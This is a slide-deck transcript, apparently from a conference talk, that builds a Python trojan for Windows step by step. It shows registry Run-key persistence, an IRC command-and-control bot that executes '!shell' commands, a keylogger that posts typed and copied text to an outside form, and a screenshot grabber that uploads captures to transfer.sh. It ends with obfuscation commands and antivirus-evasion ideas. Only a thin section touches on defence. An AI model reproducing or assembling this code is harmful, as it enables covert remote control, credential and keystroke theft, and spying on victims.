Creating a malware using Python

Transcript

1. Hello! I'm Yan Orestes, 18 years old brazilian software developer

   1 @yanorestes

2. Understanding how a malware works using Python 2

3. What is a malware? 3

4. Malware 4 malicious software

5. It's not only viruses! 5 Ransomware Virus Malware

6. Which one to pick? 6 X

7. Trojan Horse 7

8. How? 8

9. How? Python 9

10. How? Python Why? 10

11. How? Python Why? Why not? 11

12. Victim Windows (8) 12

13. 13 - James Lovelock

14. Ensuring the continuous execution of the malware 14 1 .

15. Hiding the malware in other programs 15

16. Modifying Windows Registry 16

17. Registry 17 Keys Subkeys

18. HKEY_LOCAL_MACHINE Run 18

19. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Run 19

20. How to do this using Python? 20

21. How to do this using Python? • winreg 21

22. How to do this using Python? • winreg • os

    22

23. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 23

24. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 24

25. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 25

26. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 26

27. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 27

28. 1. from os.path import realpath 2. from winreg import *

    3. 4. file_path = realpath(__file__) 5. run = r'Software\Microsoft\Windows\CurrentVersion\Run' 6. try: 7. key = OpenKey(HKEY_LOCAL_MACHINE, run, 0, KEY_SET_VALUE) 8. except PermissionError: 9. # Not running as administrator :( 10. else: 11. SetValueEx(key, 'MALWARE', 0, REG_SZ, file_path) 12. key.Close() 28

29. How to establish communication between attacker and victim? 29

30. Connecting the victim to the attacker 30 2.

31. Direct connection between attacker and victim 31

32. Using external services (like Twitter) 32

33. Connecting through an IRC network 33

34. How to do this using Python? 34

35. How to do this using Python? • socket 35

36. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 36

37. 1. import socket 2. class AttackerConnection: 3. def __init__(self, irc_address):

    4. self.socket = socket.socket() 5. self.socket.connect(irc_address) 6. 7. connection = AttackerConnection(('irc.pycon.net', 6667)) 37 That's it?

38. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 38

39. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 39

40. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 40

41. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 41

42. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 42

43. 1. import socket 2. import re 3. class AttackerConnection: 4.

    def __init__(self, irc_address, nick): 5. self.socket = socket.socket() 6. self.socket.connect(irc_address) 7. self.register_user(nick) 8. self.nick = nick 9. 10. def send_command(self, cmd): 11. cmd += '\r\n' 12. self.socket.send(cmd.encode('utf8')) 13. 14. def receive_command(self): 15. msg = self.socket.recv(4096) 16. msg=msg.decode('utf8', errors='ignore') 17. self.answer_ping(msg) 18. return msg 19. def register_user(self, nick): 20. self.send_command('NICK ' + nick) 21. self.send_command('USER {0} {0} {0} :{0}'.format(nick)) 22. 23. def answer_ping(self, msg): 24. match = re.match(PING :(.*)', msg) 25. if match: 26. pong = match.group(1) 27. self.send_command('PONG :' + pong) 43

44. 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. while True: 3.

    cmd = connection.receive_command() 4. # Handle command Main Loop 44

45. How to take control of the victim's computer? 45

46. Executing commands on the victim's computer 46 3.

47. Using os.system() 47

48. 48 Using subprocess module

49. 49 Using subprocess module

50. 50

51. 51

52. 52 1. from subprocess import run, PIPE, STDOUT 2. 3.

    def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response

53. 53 but what about the communication with the attacker? 1.

    from subprocess import run, PIPE, STDOUT 2. 3. def run_command_on_shell(cmd): 4. process_complete = run(cmd, shell=True, stdout=PIPE, stderr=STDOUT) 5. response = process_complete.stdout.decode('utf8', errors='ignore') 6. return response

54. 54 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

55. 55 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

56. 56 1. class AttackerConnection: 2. # Code omitted 3. def

    parse_msg(self, msg): 4. match = re.match(':(.*)!.*@.*(?:\..*)* PRIVMSG {} :(.*)'.format(self.nick), msg) 5. return match 6. 7. def receive_command(self): 8. msg = self.socket.recv(4096).decode('utf8', errors='ignore') 9. self.answer_ping(msg) 10. msg_match = self.parse_msg(msg) 11. if msg_match: 12. return msg_match.groups() 13. return None, None 14. # Code omitted

57. 57 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

58. 58 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

59. 59 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

60. 60 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

61. 61 1. connection = AttackerConnection(('irc.pycon.net', 6667), 'MalwareBot') 2. commands =

    {'!shell':run_command_on_shell} 3. re_commands = '|'.join(commands.keys()) 4. while True: 5. nick_from, cmd = connection.receive_command() 6. cmd_match = re.match('({})(?: (.*))?'.format(re_commands), cmd) 7. if cmd_match: 8. cmd_type, args = cmd_match.groups() 9. response = commands[cmd_type](args) 10. else: 11. response = 'Command not found' 12. connection.send_command('PRIVMSG {} :{}'.format(nick_from, response))

62. Capturing user data in real time 62 4.

63. Capturing pressed keys (keylogger) 63

64. 64 How to do this using Python?

65. • keyboard https://github.com/boppreh/keyboard 65 How to do this using Python?

66. • keyboard • requests http://docs.python-requests.org/en/master 66 How to do this

    using Python?

67. • keyboard • requests • pyperclip https://github.com/asweigart/pyperclip 67 How to

    do this using Python?

68. 1. import keyboard 2. 3. pressed_keys = [] 4. keyboard.on_press(lambda

    k: pressed_keys.append(k.name)) 68

69. Hello, world! 69 1. import keyboard 2. 3. pressed_keys =

    [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))

70. Hello, world! shiftHello,spaceworldshift! 70 1. import keyboard 2. 3. pressed_keys

    = [] 4. keyboard.on_press(lambda k: pressed_keys.append(k.name))

71. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 71

72. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 72

73. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 73

74. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 74

75. 1. import keyboard 2. 3. pressed_keys = [] 4. special_keys

    = {'space':' ', 'enter':'\n'} 5. 6. def handle_key(k): 7. if 'shift' in k.modifiers: 8. pressed_keys.pop() 9. key = k.nome 10. if len(key) > 1: 11. key = special_keys.get(key, '<< {} >>'.format(key)) 12. pressed_keys.append(key) 13. 14. keyboard.on_press(handle_key) 75 and how does the attacker access this?

76. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 76

77. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 77

78. 1. from requests import post 2. 3. url_form = #linkToForm#

    4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text}) 78

79. 79 1. from requests import post 2. 3. url_form =

    #linkToForm# 4. def handle_key(k): 5. # Code omitted 6. if len(pressed_keys) >= 100: 7. typed_text = ''.join(pressed_keys) 8. pressed_keys.clear() 9. post(url_form, {'entry.1269107664':typed_text})

80. Golden touch 80

81. 1. from pyperclip import paste 2. 3. def handle_copypaste(): 4.

    copied_text = paste() 5. pressed_keys.extend(list(copied_text)) 6. 7. keyboard.add_hotkey('ctrl+c', handle_copypaste) 81 Golden touch

82. Capturing the victim's screen 82

83. 83 How to do this using Python?

84. • pyscreenshot https://github.com/ponty/pyscreenshot 84 How to do this using Python?

85. • pyscreenshot • os 85 How to do this using

    Python?

86. • pyscreenshot • os • requests 86 How to do

    this using Python?

87. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 87

88. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 88

89. 1. from pyscreenshot import grab_to_file 2. 3. def take_screenshot(filename): 4.

    grab_to_file(filename) 5. 6. commands = {'!shell': run_command_on_shell, '!screenshot': take_screenshot} 89 and how does the attacker access this?

90. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 90

91. 1. from pyscreenshot import grab_to_file 2. from requests import post

    3. 4. def take_screenshot(filename): 5. grab_to_file(filename) 6. with open(filename, 'rb') as f: 7. r = post('https://transfer.sh', files={filename: f}) 8. response = r.text if r.status_code == 200 else 'Upload error' 9. return response 91

92. 1. from os import remove 2. from pyscreenshot import grab_to_file

    3. from requests import post 4. 5. def take_screenshot(filename): 6. grab_to_file(filename) 7. with open(filename, 'rb') as f: 8. r = post('https://transfer.sh', files={filename: f}) 9. response = r.text if r.status_code == 200 else 'Upload error' 10. return response 11. remove(filename) 92

93. Extra! 93

94. Code obfuscation 94 5.

95. Bytecode compilation 95

96. Using pyminifier 96

97. 97 Using pyminifier 1. pyminifier -O -o level1.py malware.py

98. 98 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py

99. 99 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

    pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py

100. 100 Using pyminifier 1. pyminifier -O -o level1.py malware.py 2.

     pyminifier -O --nonlatin -o level2.py malware.py 3. pyminifier -O --nonlatin --replacement-length=100 -o level3.py malware.py 4. pyminifier -O --nonlatin --replacement-length=100 --gzip -o level4.py malware.py

101. Privilege escalation 101 6.

102. Privilege escalation 102 6. • Brute force

103. Privilege escalation 103 6. • Brute force • Code injection

104. 104 How can users protect themselves?

105. Precaution 105

106. Control of the connections 106

107. Antivirus? 107

108. 108 - Anonymous expert in everything

109. 109 - Anonymous expert in everything Is it?

110. Antivirus are annoying 110

111. 111 Unexpected renovation costs Antivirus are annoying

112. 112 Unexpected renovation costs System problems Antivirus are annoying

113. 112 Unexpected renovation costs System problems :( Antivirus are annoying

114. 2010 - McAfee case 113

115. 2010 - McAfee case 114 2011 - MSE case

116. 2010 - McAfee case 115 2011 - MSE case 2012

     - Sophos case

117. Low effectiveness 116 2006 - 40-50% 2007 - 20-30%

118. Low effectiveness? 117 2006 - 40-50% 2007 - 20-30% 2013

     - 91.1-99.9%

119. 118 Humans fail

120. • Don't share files and/or links with anyone • Don't

     allow anyone besides you to use your computes • Don't use Internet for shopping, adult entertainment or online games • Never uses public WiFi • Don't share your private WiFi with anyone • Never clicks in any ads • Always uses extremely safe passwords and never repeats it on different applications • Don't use a smartphone • Don't download anything through the Internet Unless you... 119

121. • Don't share files and/or links with anyone • Don't

     allow anyone besides you to use your computes • Don't use Internet for shopping, adult entertainment or online games • Never uses public WiFi • Don't share your private WiFi with anyone • Never clicks in any ads • Always uses extremely safe passwords and never repeats it on different applications • Don't use a smartphone • Don't download anything through the Internet • Don't use an operational system Unless you... 120

122. Protection against antivirus 121 7. •

123. Protection against antivirus 122 7. • Signature => Polymorphic code

124. Protection against antivirus 123 7. • Signature => Polymorphic code

     • Sandbox => Detection (mouse) https://github.com/boppreh/mouse/

125. Protection against antivirus 124 7. • Signature => Polymorphic code

     • Sandbox => Detection (mouse) • Heuristic method => ?

126. Thank you! Any question? 125 https://speakerdeck.com/yanorestes/creating-a-malware-using-python [email protected]